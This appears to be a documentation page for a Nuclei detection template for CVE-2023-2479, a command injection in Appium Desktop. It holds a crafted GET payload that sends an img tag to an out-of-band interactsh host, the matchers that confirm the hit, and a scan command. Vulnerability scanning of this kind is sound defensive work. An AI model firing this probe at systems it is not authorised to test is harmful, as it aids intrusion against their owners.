Appium Desktop Server - Remote Code Execution
ID: CVE-2023-2479
Severity: critical
Author: zn9988
Tags: cve2023,cve,huntr,appium,oast,rce
Description
Section titled “Description”OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
YAML Source
Section titled “YAML Source”id: CVE-2023-2479
info: name: Appium Desktop Server - Remote Code Execution author: zn9988 severity: critical description: | OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4. remediation: Fixed in v1.22.3-4 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe - https://github.com/Marco-zcl/POC - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 epss-score: 0.96532 epss-percentile: 0.99605 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appium product: appium-desktop tags: cve2023,cve,huntr,appium,oast,rce
http: - method: GET path: - '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
matchers-condition: and matchers: - type: word part: body words: - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
- type: word part: header words: - 'application/json'
- type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"
- type: status status: - 404# digest: 4a0a00473045022007dd9da7881d29b796d9bb0569ca9d622c78100cb594f6013c1eb775c081d570022100cada94520002200fbc4462882d564600efeaade507855392153ccfe82592fe70:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2479.yaml"